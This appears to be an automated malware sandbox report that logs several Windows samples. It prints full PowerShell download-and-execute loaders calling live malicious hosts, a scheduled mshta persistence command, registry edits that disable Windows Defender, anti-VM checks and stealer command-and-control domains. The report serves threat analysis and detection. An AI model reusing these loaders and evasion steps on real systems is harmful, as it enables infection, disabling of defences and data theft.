C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/fghhhhhhh/vdffgd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gkfmajr/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 ofice365.github.io udp
US 185.199.109.153:443 ofice365.github.io tcp
DE 62.60.226.112:80 62.60.226.112 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs

MD5 e8b52173ea80a3b35b476222cef45835
SHA1 492bbd503f6ac03375104e5e0ec16095117732da
SHA256 15b1f23eff2c505506e6b434806d2ee0b22a6b7bade8e6760225cc36f1e4af06
SHA512 814a971f4dd36d5983dd768560032701fd5c0b19eda5d88beb5079793f4b6eb02cdfb52f2ac90a1d5293b1b2e421e09e98e5ae78150bffc4f577a65e059fbc10

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5kokdt4.mdo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3456-9-0x000002B762500000-0x000002B762522000-memory.dmp

memory/1404-23-0x0000025A3A720000-0x0000025A3A738000-memory.dmp

memory/2988-24-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2988-27-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Analysis: behavioral25

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1660 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1660 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1660 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1660 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2068 wrote to memory of 2336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1288 wrote to memory of 2376 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2376 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn Mg4E3mahjv0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hyfs1QKvc.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\Hyfs1QKvc.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn Mg4E3mahjv0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hyfs1QKvc.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE

"C:\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Hyfs1QKvc.hta

MD5 25cf786a01c7653df08c672e1e83d9e9
SHA1 f823c52c76b1bb4a0005c33210c3f7ce25021f80
SHA256 5d72ee151a7c023b9ba8ebddd35fc0263328a6e07e7c93fef17c33af9f8225f3
SHA512 1317c98629e99cb8dc495ff74338c2c9f2bc07089781475af2b2246afcc210fd7756b6930a0096326f9f777616e1917d59a6df86ed8afdde032e65d40d1ab16a

\Users\Admin\AppData\Local\TempCRO9ASROQVPIKTDO3OG3A7VVNYUYHX3T.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/2376-14-0x00000000064E0000-0x0000000006932000-memory.dmp

memory/2796-15-0x0000000001360000-0x00000000017B2000-memory.dmp

memory/2376-13-0x00000000064E0000-0x0000000006932000-memory.dmp

memory/2796-16-0x0000000001360000-0x00000000017B2000-memory.dmp

memory/2796-17-0x0000000001360000-0x00000000017B2000-memory.dmp

memory/2796-20-0x0000000001360000-0x00000000017B2000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 548 set thread context of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 548 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 548 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 504

Network

Country Destination Domain Proto
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.64.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp

Files

memory/548-0-0x00000000745DE000-0x00000000745DF000-memory.dmp

memory/548-1-0x0000000000230000-0x0000000000298000-memory.dmp

memory/1792-3-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-5-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-12-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-10-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1792-9-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-14-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-8-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1792-7-0x0000000000400000-0x000000000045E000-memory.dmp

memory/548-15-0x00000000745D0000-0x0000000074CBE000-memory.dmp

memory/1792-16-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarE27A.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/1792-54-0x0000000000400000-0x000000000045E000-memory.dmp

memory/548-55-0x00000000745D0000-0x0000000074CBE000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

144s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1848 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

